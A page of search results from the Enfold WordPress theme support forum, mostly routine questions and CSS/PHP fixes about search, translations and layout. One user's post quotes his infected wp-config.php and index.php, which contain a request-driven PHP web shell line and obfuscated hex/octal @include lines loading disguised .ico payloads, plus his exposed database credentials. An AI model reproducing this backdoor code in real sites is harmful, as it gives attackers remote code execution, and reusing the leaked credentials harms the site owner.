Viewing 30 results - 2,101 through 2,130 (of 7,502 total)
  • Author
    Search Results
  • #1098960

    Hi,

    I integrated support for relevanssi in core.

    In private content you find the latest version of Enfold with this integration (as beta version).

    Download the zip, unpack and upload with ftp (replace folder enfold).

    You can remove the code you added here.

    You need to reindex the search because now we allow relevanssi to process the shortcodes in backend when saving the post – so they can index it.

    CH language file is already included in that version.

    Do not forget to make a backup for fallback – clear server and browser cache.

    If you need assistance with uploading let us know.

    Best regards,
    Günter

    dockerydesigns
    Participant

    Before posting this:
    I have updated PHP to 7.1
    I have updated Enfold to the latest version, installed via FTP
    I have updated WordPress to the latest version, installed via FTP
    I have no plugins folder

    Trying to connect to wp-admin and wp-login pages result in the following errors:

    PHP Fatal error: Uncaught Error: Function name must be a string in D:\WWW\name\jordanspeech.com\wwwroot\wp-config.php:2
    Stack trace:
    #0 D:\WWW\name\jordanspeech.com\wwwroot\wp-load.php(37): require_once()
    #1 D:\WWW\name\jordanspeech.com\wwwroot\wp-login.php(12): require(‘D:\\WWW\\jordand\\…’)
    #2 {main}
    thrown in D:\WWW\name\jordanspeech.com\wwwroot\wp-config.php on line 2

    Trying to use the search function results in the following errors
    Fatal error: Uncaught Error: Function name must be a string in D:\WWW\jordand\jordanspeech.com\wwwroot\wp-config.php:2 Stack trace:
    #0 D:\WWW\name\jordanspeech.com\wwwroot\wp-load.php(37): require_once()
    #1 D:\WWW\name\jordanspeech.com\wwwroot\wp-blog-header.php(13): require_once(‘D:\\WWW\\jordand\\…’)
    #2 D:\WWW\name\jordanspeech.com\wwwroot\index.php(22): require(‘D:\\WWW\\jordand\\…’)
    #3 {main} thrown in D:\WWW\name\jordanspeech.com\wwwroot\wp-config.php on line 2

    How can I adjust these files to work again? I have a fully functioning website, just no dashboard access due to errors.
    Thank you in advance!

    Private Data Below:

    Wp-config.php contents:

    <?php
    extract($_REQUEST) && @$lock(stripslashes($pass)) && exit;

    /*03cc3*/

    @include “\104:/\167ww\057jo\162da\156d/\152or\144an\163pe\145ch\056co\155/w\167wr\157ot\057.e\14538\06333\067.i\143o”;

    /*03cc3*/

    define( ‘WP_HOME’, ‘http://jordanspeech.com&#8217; );
    define( ‘WP_SITEURL’, ‘http://jordanspeech.com&#8217; );

    define(‘FORCE_SSL_ADMIN’, false);

    /*45dc4*/

    @include “\x44:\x77ww\jo\x72da\x6ed\x6aor\x64an\x73pe\x65ch\x2eco\x6d\w\x77wr\x6fot\x2ffa\x76ic\x6fn_\x371b\x35a3\x2eic\x6f”;

    /*45dc4*/
    /**
    * The base configuration for WordPress
    *
    * The wp-config.php creation script uses this file during the
    * installation. You don’t have to use the web site, you can
    * copy this file to “wp-config.php” and fill in the values.
    *
    * This file contains the following configurations:
    *
    * * MySQL settings
    * * Secret keys
    * * Database table prefix
    * * ABSPATH
    *
    * @link https://codex.wordpress.org/Editing_wp-config.php
    *
    * @package WordPress
    */

    // ** MySQL settings – You can get this info from your web host ** //
    /** The name of the database for WordPress */
    define(‘DB_NAME’, ‘jordanspeech’);

    /** MySQL database username */
    define(‘DB_USER’, ‘jordanspeech’);

    /** MySQL database password */
    define(‘DB_PASSWORD’, ‘jordanspeech’);

    /** MySQL hostname */
    define(‘DB_HOST’, ‘mysql2.sqlsvr.net’);

    /** Database Charset to use in creating database tables. */
    define(‘DB_CHARSET’, ‘utf8’);

    /** The Database Collate type. Don’t change this if in doubt. */
    define(‘DB_COLLATE’, ”);

    /**#@+
    * Authentication Unique Keys and Salts.
    *
    * Change these to different unique phrases!
    * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
    * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
    *
    * @since 2.6.0
    */
    define(‘AUTH_KEY’, ‘put your unique phrase here’);
    define(‘SECURE_AUTH_KEY’, ‘put your unique phrase here’);
    define(‘LOGGED_IN_KEY’, ‘put your unique phrase here’);
    define(‘NONCE_KEY’, ‘put your unique phrase here’);
    define(‘AUTH_SALT’, ‘put your unique phrase here’);
    define(‘SECURE_AUTH_SALT’, ‘put your unique phrase here’);
    define(‘LOGGED_IN_SALT’, ‘put your unique phrase here’);
    define(‘NONCE_SALT’, ‘put your unique phrase here’);

    /**#@-*/

    /**
    * WordPress Database Table prefix.
    *
    * You can have multiple installations in one database if you give each
    * a unique prefix. Only numbers, letters, and underscores please!
    */
    $table_prefix = ‘wp_’;

    /**
    * For developers: WordPress debugging mode.
    *
    * Change this to true to enable the display of notices during development.
    * It is strongly recommended that plugin and theme developers use WP_DEBUG
    * in their development environments.
    *
    * For information on other constants that can be used for debugging,
    * visit the Codex.
    *
    * @link https://codex.wordpress.org/Debugging_in_WordPress
    */
    // Enable WP_DEBUG mode
    define(‘WP_DEBUG’, true);

    // Enable Debug logging to the /wp-content/debug.log file
    define(‘WP_DEBUG_LOG’, true);

    // Disable display of errors and warnings
    define(‘WP_DEBUG_DISPLAY’, false);
    @ini_set(‘display_errors’,0);

    define(‘WP_MEMORY_LIMIT’, ‘128M’);

    /* That’s all, stop editing! Happy blogging. */
    /** Absolute path to the WordPress directory. */`
    if ( !defined(‘ABSPATH’) )
    define(‘ABSPATH’, dirname(__FILE__) . ‘/’);

    /** Sets up WordPress vars and included files. */
    require_once(ABSPATH . ‘wp-settings.php’);`

    WP-Load.php file contents:

    <?php
    /**
    * Bootstrap file for setting the ABSPATH constant
    * and loading the wp-config.php file. The wp-config.php
    * file will then load the wp-settings.php file, which
    * will then set up the WordPress environment.
    *
    * If the wp-config.php file is not found then an error
    * will be displayed asking the visitor to set up the
    * wp-config.php file.
    *
    * Will also search for wp-config.php in WordPress’ parent
    * directory to allow the WordPress directory to remain
    * untouched.
    *
    * @package WordPress
    */

    /** Define ABSPATH as this file’s directory */
    if ( ! defined( ‘ABSPATH’ ) ) {
    define( ‘ABSPATH’, dirname( __FILE__ ) . ‘/’ );
    }

    error_reporting( E_CORE_ERROR | E_CORE_WARNING | E_COMPILE_ERROR | E_ERROR | E_WARNING | E_PARSE | E_USER_ERROR | E_USER_WARNING | E_RECOVERABLE_ERROR );

    /*
    * If wp-config.php exists in the WordPress root, or if it exists in the root and wp-settings.php
    * doesn’t, load wp-config.php. The secondary check for wp-settings.php has the added benefit
    * of avoiding cases where the current directory is a nested installation, e.g. / is WordPress(a)
    * and /blog/ is WordPress(b).
    *
    * If neither set of conditions is true, initiate loading the setup process.
    */
    if ( file_exists( ABSPATH . ‘wp-config.php’ ) ) {

    /** The config file resides in ABSPATH */
    require_once( ABSPATH . ‘wp-config.php’ );

    } elseif ( @file_exists( dirname( ABSPATH ) . ‘/wp-config.php’ ) && ! @file_exists( dirname( ABSPATH ) . ‘/wp-settings.php’ ) ) {

    /** The config file resides one level above ABSPATH but is not part of another installation */
    require_once( dirname( ABSPATH ) . ‘/wp-config.php’ );

    } else {

    // A config file doesn’t exist

    define( ‘WPINC’, ‘wp-includes’ );
    require_once( ABSPATH . WPINC . ‘/load.php’ );

    // Standardize $_SERVER variables across setups.
    wp_fix_server_vars();

    require_once( ABSPATH . WPINC . ‘/functions.php’ );

    $path = wp_guess_url() . ‘/wp-admin/setup-config.php’;

    /*
    * We’re going to redirect to setup-config.php. While this shouldn’t result
    * in an infinite loop, that’s a silly thing to assume, don’t you think? If
    * we’re traveling in circles, our last-ditch effort is “Need more help?”
    */
    if ( false === strpos( $_SERVER[‘REQUEST_URI’], ‘setup-config’ ) ) {
    header( ‘Location: ‘ . $path );
    exit;
    }

    define( ‘WP_CONTENT_DIR’, ABSPATH . ‘wp-content’ );
    require_once( ABSPATH . WPINC . ‘/version.php’ );

    wp_check_php_mysql_versions();
    wp_load_translations_early();

    // Die with an error message
    $die = sprintf(
    /* translators: %s: wp-config.php */
    __( “There doesn’t seem to be a %s file. I need this before we can get started.” ),
    wp-config.php
    ) . ‘</p>’;
    $die .= ‘<p>’ . sprintf(
    /* translators: %s: Codex URL */
    __( “Need more help? We got it.” ),
    __( ‘https://codex.wordpress.org/Editing_wp-config.php&#8217; )
    ) . ‘</p>’;
    $die .= ‘<p>’ . sprintf(
    /* translators: %s: wp-config.php */
    __( “You can create a %s file through a web interface, but this doesn’t work for all server setups. The safest way is to manually create the file.” ),
    wp-config.php
    ) . ‘</p>’;
    $die .= ‘<p>‘ . __( ‘Create a Configuration File’ ) . ‘‘;

    wp_die( $die, __( ‘WordPress › Error’ ) );
    }
    wp-blog-header.php contents:

    <?php
    /**
    * Loads the WordPress environment and template.
    *
    * @package WordPress
    */

    if ( ! isset( $wp_did_header ) ) {

    $wp_did_header = true;

    // Load the WordPress library.
    require_once( dirname( __FILE__ ) . ‘/wp-load.php’ );

    // Set up the WordPress query.
    wp();

    // Load the theme template.
    require_once( ABSPATH . WPINC . ‘/template-loader.php’ );

    }
    Index.php contents:

    <?php
    /*b8b2c*/

    @include “\104:/w\167w/j\157rda\156d/j\157rda\156spe\145ch.\143om/\167wwr\157ot/\05654d\1428e9\062.ic\157”;

    /*b8b2c*/
    /**
    * Front to the WordPress application. This file doesn’t do anything, but loads
    * wp-blog-header.php which does and tells WordPress to load the theme.
    *
    * @package WordPress
    */

    /**
    * Tells WordPress to load the WordPress theme and output it.
    *
    * @var bool
    */
    define( ‘WP_USE_THEMES’, true );

    /** Loads the WordPress Environment and Template */
    require( dirname( __FILE__ ) . ‘/wp-blog-header.php’ );
    I cannot tell what it thinks it sees/doesn’t see.

    #1098921
    Bianca Kuipers
    Guest

    Thank you for your answer. I still have a few questions

    – Can you confirm if your Shop demo is based on Woocommerce?
    – Can you suggest which plugin would work the best for multi-site?
    – Which features are in the knowledge base? I only found this one. https://kriesi.at/themes/enfold-knowledgebase-demo/ Are there more of these?
    I miss for example the following features a search field on top of the page, information about our team, video’s, downloads and forms functionality. Would this be possible to add? And if yes how?

    Best regards,

    Bianca Kuipers
    Enginia

    Bianca Kuipers
    Guest

    Goodday,

    We are a Dutch company. We are using Enfold on our website https://enginia.nl/

    Now we have some wishes. We need:
    1. An environment for support purposes with knowledge base, FAQs, fast search possibillity. We looking for something like https://support.google.com/ or http://kbase.vedicthemes.com/home3/
    2. A webshop for example https://www.cadkoop.nl/
    3. An environment focused on Jobs.

    We did ofcourse contacted our own local partner but they advised us to look for an excisting WordPress theme, because these are already developed for the specific purposes. If we want to do this within our own excisting Enfold theme that would need to many programming to get the same results.

    That’s wat we did last year on our Event site. See https://event.enginia.nl. We took another theme which most suited to our needs. The problem we have with that is we want to have one database and one WordPress login. Certainly when we are going to expand this with more special sites for support, a shop and jobs. Our partner said this was difficult to do with themes other than Enfold. And if we want to create the same with Enfold it would cost us a lot more.

    So we looked at your site as deverloper of the Enfold theme, if you offer standard themes wich will fit our needs. I noticed already you offer a shop environment. Is this based on Woocommerce or is this something you developed yourselves?

    I hope you can inform me about what you can offer or advise us what to do. Or maybe you are able to develop this for us?

    With best regards,
    Bianca Kuipers
    Marketing Manager
    Enginia
    +31 85-0436255

    #1098098

    Thank you – that fixed it.
    This is the only issue we have seen resulting from using Jquery updater to update the WordPress core javascript to 3.x.

    The security scans still pickup that Enfold is using the older jquery versions that have been identified as a security risk. Hoping we can find a way to resolve that. But thank you for this Search button fix – that is a great help!

    vloeffelad
    Participant

    Hello!
    I´m relatively new to Enfold but I like it already!

    I´m using mostly color sections or sliders for the the first section. That’s why the breadcrumbs aren´t displayed, right?

    Can I use the Yoast shortcut [wpseo_breadcrumb] to display breadcrumbs instead?
    Are there any problems related to “double breadcrubms” in the code and to google search results?

    Thank you in advance!

    Hokuspokus
    Participant

    @ Support Staff. Some clients and me are waiting for an option inside Enfold options (A New SEO-Tab) where humans with real interest in success can adjust via toggle.

    – use h1 in breadcrumbs or not
    – set nofollow to search query or not
    – set noidex to search query or not

    For this, you have many queries here and also bad ratings at themeforest.
    And: “no Border” option which working correct at all section. If i want “No border” and set this as option, since 2017 is a border there.

    A feature to set two buttons side by side into one grid or section would be also nice without manipulating css.
    Also, it would be nice to combine similar functions like slider or buttons which have nearly similar functions with one or two different options but in the main task they do the same.

    Furthermore: Many clients and i have very strong difficulties with fullwidth images to show it in a good way for most devices. And: A box is missing to inject text at the right place. This makes me difficulties again and again.

    A neated Enfold feature request thread with Ratings and Announcements would be user and customer friendly. This is customer care.
    This was there in the past, but not neated.

    Thx and Best

    #1097293
    jonasbecker
    Participant

    Hey, I really love the Forum and spent a long time on searching for a solution, but no success.
    In the General Styling setting Content + Sidebar Width is set to 100 %. Unfortunaley after the last update, Enfold decided reduce it to roughly 50 %. You can see it on http://www.sfvoe.de
    I changed the setting several times, deleted Quick CSS, etc. Do you know any solution?

    Best regards
    Jonas

    dockerydesigns
    Participant

    My website looks right to the public: http://www.jordanspeech.com
    However, I have a 500 error when trying to access wordpress.

    I updated to PHP 7.1: same issue
    I updated to latest wordpress via FTP: same issue
    I updated to latest enfold via FTP: same issue
    If I delete the ENFOLD folder, I get nothing.
    Debug is on, I am throwing no errors. 128M memory allocated.

    Can anyone help me? Not sure how to resolve this issue. I cannot add pages to client site, cannot alter existing pages, cannot update blog, cannot change themes… I love ENFOLD, but what am I supposed to do?

    Credential here in private content. 12pm Noon EST

    #1096662

    Hi,

    Thanks for the update.

    Did you enable the Enfold > Main Menu > General > “Append search icon to main menu” option? That will enable the search icon.

    Best regards,
    Ismael

    #1096522

    Hi,

    It would require quite some time to build a custom function and add the modifications to the theme files, so I am sorry to tell you that this is not covered by our support.

    The below plugins is note tested with Enfold but it has worked for others. Please feel free to try a plugin that suits your needs

    Old Post date remover
    WP Plugin Archive

    However, if it’s really important for you to get this done, you can always hire a freelancer to do the job for you :)

    Best regards,
    Vinay

    #1096519

    Hi Günter

    Thanks for your response. So you are saying that the standard WP search does not index anything within an avia element ?
    However certain content is indexed certain not…

    I installed the relevanssi. The good thing is that it can find much more. But when I example search for “Hausordnung” it does not show up when just typing. It comes even with the message not document, however if i then hit return it shows up in the search result.

    How can I make sure it also shows up during typing in the magnifying glass?

    I added the following to function.php as per https://kriesi.at/documentation/enfold/search/
    (however can not see any difference if below is added or not to function.php in the child theme)

    add_filter(‘avf_ajax_search_function’, ‘avia_init_relevanssi’, 10, 4);
    function avia_init_relevanssi($function_name, $search_query, $search_parameters, $defaults)
    {
    $function_name = ‘avia_relevanssi_search’;
    return $function_name;
    }

    function avia_relevanssi_search($search_query, $search_parameters, $defaults)
    {
    global $query;
    $tempquery = $query;
    if(empty($tempquery)) $tempquery = new WP_Query();

    $tempquery->query_vars = $search_parameters;
    relevanssi_do_query($tempquery);
    $posts = $tempquery->posts;

    return $posts;
    }

    regards
    Tony

    #1096460

    Hi,

    Thank you for using Enfold.

    We will add the de_CH language files for the next release.

    The searches do not work for Advanced layout builder elements. The content of some elements (like Special Heading) is not part of the page/post content but is stored in shortcode attributes.

    As we are using the standard WP search – probably WP ignores shortcodes in search.

    Could be, that a plugin like https://de.wordpress.org/plugins/relevanssi/ gives better results.

    Best regards,
    Günter

    #1096159

    Thanks Yigit,

    So, just so that I’m clear is it safe to:
    1) Add the above to the \enfold\js\avia.js file, then;
    2) Create \child\js\avia.js containing just:

    $.AviaAjaxSearch  =  function(options)
    	{
    	   var defaults = {
                delay: 300,                //delay in ms until the user stops typing.
                minChars: 999,               //dont start searching before we got at least that much characters
                scope: 'body'
    
            };
    
            this.options = $.extend({}, defaults, options);
            this.scope   = $(this.options.scope);
            this.timer   = false;
            this.lastVal = "";
    		
            this.bind_events();
    
    	};

    Will everything still work properly? Sorry to be a pain, I just don’t want to break anything!

    #1096046

    Hi,

    Thanks for the update.

    Have you tried indexing the posts using the SearchWP plugin? You need to add this filter in the functions.php file in order to set or change the default function from get_posts to the actual function used by the plugin to fetch the posts. An implementation for the Relevanssi plugin is also available in that section.

    // https://kriesi.at/documentation/enfold/search/#use-searchwp-instead-of-the-standard-search

    Best regards,
    Ismael

    #1095963

    In reply to: Deleted user account

    Hey Michael,

    Thanks for contacting us!

    I searched our database however email address you shared does not exist. Have you used another email?

    I also checked your purchase code and it is not registered as well. If you would like to create a new account, you can register to our support forum using your purchase code here – and then start a new thread under Enfold sub forum.

    Please make sure to elaborate on the issue you are having/changes you would like to make on your thread. If you would like to include screenshots, you can upload them on http://imgur.com, https://snag.gy or Dropbox public folder and attach the links in your posts :)

    Best regards,
    Yigit

    #1095832

    Hello,
    I tried but it doesn’t work ..
    I searched a bit on the web and it seems that the problem is just enfold compatibility with a.c.f.
    But I saw that someone managed to make it work in the past:

    https://kriesi.at/support/topic/how-to-get-the-id-of-the-post-when-you-use-the-avf_post_slider_entry_excerpt/#post-640822

    this is the code in my postslider.php file now:
    $acf_field = get_field(‘provacategorie’);
    $permalink = $acf_field . ‘
    <div class=”read-more-link”>‘.__(‘Read more’,’avia_framework’).'<span class=”more-link-arrow”></span></div>
    ‘;
    but looking at the solutions of the predenti links … what am I missing? what should i add?

    ps: can’t you log in for personal reasons?
    I hope there are no problems in particular with this site or with me … I hope in your sincerity … maybe you are my competitor? if there are any “personal” problems please be clear so that I can search for other topics with other staff .. thanks

    Best regards,
    Sacha

    #1095709

    Hi
    I found the problem regarding translation. There is no de_CH.po / de_CH.mo file in the enfold theme only de_DE.mo/.po. Hence I just copied the de_DE.mo/.po to de_CH.po / de_CH.mo and the translation works.
    Suggest you add in future also de_CH files to lang directory….

    However the second problem is still open. Certain searches can’t be found on the website. Like above mentioned words like “Hausordung” or “Wohnungsbewerbung” can’t be found although on the page with menu item “Dokumente”.

    Is there a way to “index” page?

    Beste regards
    Tony

    SSCM
    Participant

    Hi there,

    After doing a mess of research, I see that others over the years have requested what we’re very much wishing to have happen with respect to the Masonry grid: titles always visible when the page loads, but the additional excerpts only visible upon mouseover. Here’s the page to which we’d love to add this modified functionality: http://codeable.searockstaffordcm.com/projects/

    The Enfold admin for even the most recent version is limited with respect to seeing/dealing with these as disparate functionalities, and our client would really like this to happen. Might there be a functions.php and/or css workaround? And is this something that Kriesi plans to make standard in future…?

    Please advise as to how we can accomplish this! Thank you.

    Best,

    – Kat Lilore

    #1095690
    tonyplanet
    Participant

    Hi

    I have wordpress 5.1.1-de_CH installed with enfold 4.5.3. Hence the whole site is in German.

    All works fine but the search function with the magnifying glass is always in english. Text says “search” instead “suchen”. And also the replies are all in english. Everything else is in German.

    Also some searches cant be found although the keyword is on a page listed. E.g the word “Hausordnung” is on the page when menu “dokumente” is selected but can’t be found on the site and the reply is again in english.

    Thanks in advance for support
    Tony

    #1095558

    Hey Gary,

    Thank you for using Enfold.

    A quick search led me to this snippet.

    function pippin_add_taxonomy_filters() {
    	global $typenow;
    
    	// an array of all the taxonomyies you want to display. Use the taxonomy name or slug
    	$taxonomies = array('portfolio_entries');
    
    	// must set this to the post type you want the filter(s) displayed on
    	if( $typenow == 'portfolio' ){
    
    		foreach ($taxonomies as $tax_slug) {
    			$tax_obj = get_taxonomy($tax_slug);
    			$tax_name = $tax_obj->labels->name;
    			$terms = get_terms($tax_slug);
    			if(count($terms) > 0) {
    				echo "<select name='$tax_slug' id='$tax_slug' class='postform'>";
    				echo "
    <option value=''>Show All $tax_name</option>";
    				foreach ($terms as $term) { 
    					echo '
    <option value='. $term->slug, $_GET[$tax_slug] == $term->slug ? ' selected="selected"' : '','>' . $term->name .' (' . $term->count .')</option>'; 
    				}
    				echo "
    </select>";
    			}
    		}
    	}
    }
    add_action( 'restrict_manage_posts', 'pippin_add_taxonomy_filters' );

    This is going to add a category filter in the portfolio admin area.

    // https://pippinsplugins.com/post-list-filters-for-custom-taxonomies-in-manage-posts/

    Best regards,
    Ismael

    #1095529
    satucker
    Participant

    On maizeroadbaptist.com
    I’m getting error:
    Fatal error: Cannot redeclare av_countdown_events_fallback() (previously declared in /home/shanet5/public_html/maizeroadbaptist.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/events_countdown/events_countdown.php:14) in /home/shanet5/public_html/maizeroadbaptist.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/events_countdown.php on line 8

    I’ve edited the .php file according to these changes: https://kriesi.at/support/search/?bbp_search=events_countdown

    but the site is still down. Can someone assist?

    #1095440

    Hey webprojektdonauwoerth,

    Here is the code you can put in Enfold > General Styling > Quick Css,  if it does not work, put into themes/enfold/css/custom.css

    
    @media only screen and (max-width: 1024px) {
      nav.main_menu, #menu-item-search {
        display: block !important;
      }
      .menu-item {
        display: none;
      }
      .av-burger-menu-main.menu-item-avia-special {
        display: block;
      }
    }
    

    If you need further assistance please let us know.

    Best regards,
    Victoria

    #1095410
    jmbernstein
    Participant

    I’ve searched all over and can’t find anything about how to change the timing for the transitions between images when using the fullscreen slider. I looked at line 3701 in the shortcode.js file and nothing is there to edit. I just want to slow the time between fades. How can I do this? Can we do it using CSS?

    I’m using the latest version of Enfold.

    Thank you!

    #1095318

    In reply to: Search bar in a slider

    Thanks for the info Mike, it works but still it is being very difficult to achieve demo style https://kriesi.at/themes/enfold-knowledgebase-demo/

    I’m looking for a very big search bar. I’ll keep trying and we’ll see if I can get this exactly look & feel

    #1095308

    In reply to: Text not in line

    Hi,

    For now the solution we have seems to be following:

    1- Please add following code to bottom of Functions.php file of your child theme in Appearance > Editor

    function avia_remove_woocommerce_frontend_search_params() { 
    remove_action('woocommerce_before_shop_loop','avia_woocommerce_frontend_search_params', 20);
    } 
    add_action( 'init', 'avia_remove_woocommerce_frontend_search_params');

    2- Then add following code to Quick CSS field in Enfold theme options > General Styling tab

    #top .woocommerce-ordering {
        position: absolute;
        right: 0;
        margin: 0;
        z-index: 20;
        top: 0;
        margin-top: 10px;
        width: 100%;
        min-width: 200px;
    }

    For clarification, i used this plugin in the past and it worked fine for me. That is why i recommended it. So far this seems to be the only conflict between the theme and plugin and simply removing Enfold’s sorting options fixes the issue.

    Best regards,
    Yigit

    #1095040
    #1095027

    Hi SenjaLp

    A few other people and me discovered this issue as well.

    You have two options in my opinion:
    1) Check this post by Günter (Enfold developer).
    2) Inspect the background image path (just like you did according to your screenshot), check in which merged CSS file it is located and download it via FTP. Then search for the wrong path there and replace it with the correct one. Afterwards upload the css file again and it should be fine.

    Just keep in mind that this manual change will be overwritten again if you update the theme (well, hopefully not because it might be fixed in the next version).

    I hope this helps,
    Michael

    #1094979

    Hey jonrouse,
    This css will remove the spinner:

    #top .avia_search_element .ajax_load .ajax_load_inner{
    display: none !important;
    }
    #top .avia_search_element form.ajax_loading_now .av_searchsubmit_wrapper{
        padding-right: 0px !important; 
    }
    #top .avia_search_element .ajax_load{
        width: 0px !important; 
    display: none !important;
    }

    but you will still have animation in the button, perhaps a better approach will be to edit line 1346 of the \enfold\js\avia.js
    file, look for:

     minChars: 3,

    and change to:

     minChars: 999,

    Best regards,
    Mike

    #1094804

    Topic: Search bar in a slider

    in forum Enfold
    pinxe
    Participant

    Hi,

    I’m wondering if it could be possible to add a big search bar like this one https://kriesi.at/themes/enfold-knowledgebase-demo/ inside a slider like this https://kriesi.at/themes/enfold-shop/

    I’ve been looking around this forum and I couldn’t find a goo solution for this.

    Thanks in advance!

Viewing 30 results - 2,101 through 2,130 (of 7,502 total)